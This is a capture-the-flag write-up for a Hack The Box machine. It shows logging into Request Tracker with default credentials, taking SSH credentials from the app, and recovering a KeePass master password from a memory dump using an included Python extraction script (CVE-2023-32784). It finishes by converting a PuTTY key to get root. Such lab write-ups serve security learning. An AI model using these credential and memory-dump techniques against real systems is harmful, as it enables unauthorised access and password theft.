
Hello hackers, I am back again. Let's have a simple walkthrough of an easy box from Season 2 of Hack The Box. I was afraid of writing writeups for these machines, to avoid getting suspended from hacking.

As usual with hacking or pentesting, methodology is what will save you.

Let's begin, hackers.

STEP 1: SCANNING


The scan shows two open ports, but one of them is reported as filtered, hmmm.

STEP 2: ENUMERATION

Let's enumerate the ports one after another.

Port 22 is SSH. To access it we need credentials, which we don't have yet, so we need to find another way into the target machine.

Port 80 is running HTTP but appears filtered. At first I was worried, because if the port really is in a filtered state we would need to find a way past the filter to reach the server. But if we browse to the IP on port 80 it can be accessed, which was really cool.

STEP 3: EXPLOITATION


It seems we have a domain and a subdomain here; let's add them to our /etc/hosts.


When we click the redirection link it takes us to a login page.


The login page looks cool, but I didn't want to go at it directly; I tried another approach to getting past the login. I knew that with this login page I wouldn't need to brute-force, just a simple trick. HTB is usually about tricks, so I started looking for what was suspicious about the login page.

You can google what RT is, and since we have a login page you can also search for "RT default creds".


username:root
password:password

Let's try the creds.


Just like that I'm in; really cool and happy.


If we check the Admin section we find something useful and cool: the domain and a username.


And finally we got something useful: a username. Looking around further, I found this:


STEP 4: FOOTHOLD

Since we now have SSH creds, we can try to gain remote access to the target machine via SSH.

email:lnorgaard@keeper.htb
password:Welcome2023!


STEP 5: PRIVILEGE ESCALATION

Let's have some fun getting root; it was really cool and simple.


Remember the .zip file we saw? Let's transfer it to our local machine and dig into it.


Okay, here we see two files. The dump file is the one that contains the passcode that gets us into the database, so we need to analyse the DumpFull.dmp file and see if we can recover a passcode for the .kdbx database.

After some searching I found the PoC and forked it so I can get to it easily.

https://github.com/alien-keric/keepass-dump-masterkey.git

With the Python script we can try to dump the KeePass master key like this:


command: python poc.py KeePassDumpFile.dmp

It seems some characters are missing here, so I tried googling to see if I could recover them.
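To show what the PoC is actually looking for in the dump, and why the first character can never be recovered, here is a small added example (my own code, not the linked PoC or anything from the box). It assumes the known leak: KeePass 2.x before 2.54 built a new string of N masking dots plus the typed character for every keystroke, and those strings stay in memory as UTF-16LE. The dump is constructed inline; no real dump is included.

```python
import re

# KeePass 2.x before 2.54 (CVE-2023-32784) built a new .NET string for every
# keystroke in the master-password box: N masking dots "●" followed by the
# character just typed. Those strings are never scrubbed, so a memory dump
# still holds "●ø", "●●d", "●●●g", ... as UTF-16LE. "●" is U+25CF = bytes CF 25.
DOT = "\u25cf"
LEAK_RE = re.compile(rb"((?:\xcf\x25)+)(..)", re.DOTALL)


def leaked_candidates(dump: bytes) -> dict:
    """Map password index -> set of characters seen right after that many dots."""
    found = {}
    for m in LEAK_RE.finditer(dump):          # byte-offset scan, no alignment assumed
        n = len(m.group(1)) // 2              # number of dots == index of the typed char
        ch = m.group(2).decode("utf-16-le", errors="replace")
        if ch in (DOT, "\ufffd") or not ch.isprintable():
            continue                          # dots-only strings, NUL terminators, junk
        found.setdefault(n, set()).add(ch)
    return found


def reconstruct(dump: bytes) -> str:
    """Render what the dump reveals: '?' for index 0 (never leaked), {a|b} when ambiguous."""
    cands = leaked_candidates(dump)
    if not cands:
        return ""
    out = []
    for i in range(max(cands) + 1):
        chars = sorted(cands.get(i, ()))
        if not chars:
            out.append("?")
        elif len(chars) == 1:
            out.append(chars[0])
        else:
            out.append("{" + "|".join(chars) + "}")
    return "".join(out)


def make_fake_dump(typed: str) -> bytes:
    """Constructed sample dump (not a real KeePass dump) with the leftover strings for `typed`."""
    chunks = [b"heap junk\x00" * 3]
    for i in range(1, len(typed)):            # index 0 never produces a dotted string
        s = (DOT * i + typed[i]).encode("utf-16-le")
        chunks.append(s + b"\x00\x00" + b"A" * 7)   # string terminator + odd-length filler
    chunks.append((DOT * len(typed)).encode("utf-16-le") + b"\x00\x00")  # dots only: no leak
    return b"".join(chunks)


if __name__ == "__main__":
    print(reconstruct(make_fake_dump("rødgrød med fløde")))   # ?ødgrød med fløde
```

The `?` at index 0 is exactly the gap the writeup hits: the first keystroke creates no dotted string, so that character has to be guessed or googled.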


passcode: Rødgrød med Fløde (rødgrød med fløde)

NB: if you try the name exactly as it is you get an error, so you need to change the uppercase letters to lowercase and then submit it.


Opening passcode.kdbx on Windows is very simple; on Linux you can just install keepass2 to be able to open this file.

After submitting our passcode we get some files.


If we click the first entry we get this output:


Now the waiting is over. In the notes section above we have a PuTTY .ppk key; let's find a way to convert it to .pem (OpenSSH) format.

You can check here

https://repost.aws/knowledge-center/ec2-ppk-pem-conversion

NB: the main idea behind the privilege escalation is ppk2pem.

First of all you have to install putty-tools:

command: sudo apt-get install putty-tools

After that you can use the following command to convert the file:

command: puttygen rsa.ppk -O private-openssh -o output.pem


From there you can go and grab the root flag.


The machine was cool and really simple.